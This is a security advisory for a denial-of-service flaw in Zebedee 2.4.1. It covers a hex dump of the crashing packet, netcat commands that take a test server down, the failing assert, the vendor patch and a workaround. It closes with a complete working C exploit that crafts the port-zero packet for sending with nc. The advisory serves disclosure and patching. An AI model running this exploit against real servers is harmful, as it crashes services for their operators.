Summary
"Zebedee is a simple program to establish an encrypted, compressed tunnel for TCP/IP or UDP data transfer between two systems." Lack of proper validation of the user provided port range allows attackers to cause the Zebedee program to crash.

Credit:
The information has been provided by Shiraishi.M.

Details
Vulnerable Systems:
* Zebedee version 2.4.1

Immune Systems:
* Zebedee version 2.4.1a

The server crashes whenever "0" received as the port number in the protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c

The 9th and 10th byte of the header contains 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
sent 0, rcvd 0

$

In the zebedee.c, look at the function makeConnection() which called from server(),

1703 /* Sanity check */
1704
1705 assert(host != NULL && port != 0);
1706

Here, if the port number is "0", both sub and parent processes seemed to quit running.

This issue occurs when the "allowed redirection port" not set(in default).

Vendor Patch:
*** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
--- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
***************
*** 22,28 ****
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1"

#include <stdio.h>
#include <stdlib.h>
--- 22,28 ----
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1A"

#include <stdio.h>
#include <stdlib.h>
***************
*** 3936,3941 ****
--- 3936,3950 ----
assert(AllowedTargets != NULL);

/*
+ ** Port 0 is invalid data in the request packet, never allowed
+ */
+ if (port == 0)
+ {
+ message(0, 0, "request for target port 0 disallowed");
+ return 0;
+ }
+
+ /*
** If the address is all zeroes then we will assume the default target
** host, if any.
*/

Workaround:
Setting up allowed redirection ports will address this issue.

Exploit:
/*
$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
$ ./mkZebedeeDoS > zebedeeDoS
$ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{
int i, size;

char data[] = {
0x02, 0x01, // protocol version
0x00, 0x00, // flags
0x20, 0x00, // max message size
0x00, 0x06, // compression info
0x00, 0x00, // port request: value = 0x0
0x00, 0x80, // key length
0xff, 0xff, 0xff, 0xff, // key token
0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
0x00, 0x00, 0x00, 0x00 // target host address
};

size = 28;
for(i=0; i<size; i++){
printf("%c", data[i]);
}

return 0;

}